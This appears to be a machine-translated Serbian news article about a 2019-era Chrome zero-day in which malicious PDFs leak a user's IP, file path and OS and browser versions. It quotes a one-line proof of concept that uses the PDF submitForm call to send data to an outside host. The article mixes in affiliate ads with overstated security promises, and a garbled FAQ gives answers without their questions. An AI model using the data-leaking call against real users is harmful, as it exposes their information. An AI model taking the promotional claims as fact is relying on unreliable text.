- ЕдгеСпот је открио интригантну рањивост нултог дана искоришћавајући ПДФ документе у Цхроме-у.
- Ово рањивост може вам наштетити прикупљањем осетљивих података на рачунару.
- Истражите наше Веб и Цлоуд страница за више увида о другим алатима и услугама.
- Ако сте заинтересовани за прегледаче, ми пружамо пуно информација о њима у нашем Бровсер Хуб.
Учините све своје документе доступним и безбедним помоћу Адобе Ацробат Реадер-а. Овај алат за управљање документима такође ће вам омогућити е-потпис и стварање званичних образаца како бисте уштедели време на послу. Набавите га за свој рачунар и моћи ћете:
- Отворите, одштампајте и уредите све своје ПДФ и друге врсте датотека
- Лакше попуните ПДФ обрасце
- Нека ваши основни документи буду шифровани
Набавите све апликације по посебној цени!
Светски софтвер за управљање документима бр. 1 сада је по повољној цени, зато пожурите!
Услуга откривања експлоатације ЕдгеСпот открила је интригантан Хром нул-дневна рањивост која користи ПДФ документе.
Рањивост омогућава нападачима да прикупити осетљиве податке користећи злонамерне ПДФ документе отворене у Цхроме-у.
Чим жртва отвори одговарајуће ПДФ датотеке у Гоогле Цхроме-у, злонамерни програм почиње да ради у позадини прикупљањем корисничких података.
Подаци се затим прослеђују удаљеном серверу који контролишу хакери. Можда се питате које податке нападачи усисавају, они циљају следеће податке на вашем рачунару:
- ИП адреса
- Пуни пут ПДФ датотеке на систему
- Верзије ОС-а и Цхроме-а
Пазите се ПДФ датотека које садрже малвер
Стручњаци уочен да је један од два домена реаднотифи [.] цом или бурпцоллаборатор [.] нет је примао податке.
Открили су да нападачи користе тхис.субмитФорм () ПДФ Јавасцрипт АПИ за прикупљање осетљивих информација корисника.
Тестирали смо га са минималним ПоЦ-ом, једноставним АПИ позивом тхис.субмитФорм (‘ http://google.com/test’) учиниће да Гоогле Цхроме пошаље личне податке на гоогле.цом.
Ову Цхроме грешку су користила два различита скупа злонамерних ПДФ датотека, обе које су циркулирале у октобру 2017., односно септембру 2018. године.
Нарочито, прикупљени подаци могу се користити за прецизно подешавање напада у будућности. Извештаји сугеришу да је прва серија датотека састављена помоћу услуге праћења ПДФ-а РеадНотифи.
Корисници могу користити услугу за праћење корисничких прегледа. ЕдгеСпот није пренео никакве детаље у вези са природом другог сета ПДФ датотека.
Кратки савет: Промените прегледач у Опера
У овим тешким временима нападнути смо малвером, пхисхинг-ом и тројанским вирусима на сваком кораку, тако да морамо бити много опрезнији и остати заштићени.
А како је ово проблем специфичан за Цхроме, ту пријетњу и све друге можете избјећи помоћу претраживача оријентисаног на сигурност Опера.
Овај прегледач долази са уграђеним блокадом огласа који не само да уклања такве сметње већ и блокира аналитичке скрипте, пиксели за праћење и методе за прикупљање података.
А ако желите да будете потпуно сигурни да се клоните било какве опасности, станите иза уграђеног ВПН услугу која је 100% бесплатна за коришћење неограничено време.
Опера
Опера нуди савршену заштиту од претњи помоћу уграђеног блокатора огласа и ВПН услуге бесплатно!
Посетите сајт
Како могу остати заштићен од ПДФ рањивости?
Преузмите Адобе Ацробат ПРО
Адобе и Цхроме се добро подударају када је у питању руковање ПДФ датотекама. Инсталирањем Адобе Ектенсион за Цхроме можете прегледати ПДФ датотеке и манипулисати њима по свом укусу без напуштања омиљеног прегледача.
Упркос робусној структури, злонамерни софтвер скривен у ПДФ датотекама можда неће бити откривен ако користите стандардну верзију Реадер-а.
Препоручује се професионална верзија која гарантује вашу заштиту и штити ваше податке од хакера.
Иако није бесплатна, цена коју ћете платити прилично је мала за мноштво додатних функција у којима ћете уживати, укључујући побољшану сигурност ПДФ датотека.
Укључен је и 7-дневни бесплатни пробни период како бисте могли да окусите цело Про искуство пре куповине.
Адобе Ацробат ПРО
Држите се даље од малвера преузимањем Адобе Ацробат ПРО. Има пуно више функција од бесплатне верзије и штити ваше податке.
Посетите сајт
У случају да желите да будете сигурни током сурфовања Интернетом, мораћете да набавите потпуно наменски алат за заштиту мреже. Инсталирајте приватни приступ Интернету одмах и осигурајте се. Штити ваш рачунар од напада током прегледавања, маскира вашу ИП адресу и блокира сав нежељени приступ.
Услуга откривања експлоатације ЕдгеСпот желела је да упозори кориснике Цхроме-а о потенцијалним ризицима јер се није очекивало да ће закрпа бити објављена у блиској будућности.
ЕдгеСпот је прошле године известио Гоогле о рањивости, а компанија је обећала да ће објавити закрпу крајем априла.
Међутим, можете размотрити могућност привременог решавања проблема локалним прегледом примљених ПДФ докумената помоћу друге апликације читача.
Можете и да отворите ПДФ документе у Цхроме-у тако што ћете системом прекинути везу са Интернетом.
Често постављана питања
Да јесте. Али ако желите шири избор, истражите наше најбоље изборе за Хромприватност проширења у овај комплетан водич.
Т.овде има пуно проширења која дозвољавају ПДФ-ови обрада. Проверавати ван наше одличан водич о најбољим ПДФ додацима за Цхроме.
Није, али можете га брзо активирати. Ево нашег свеобухватан водич о томе како да омогућите генератор КР кода у Цхроме-у.
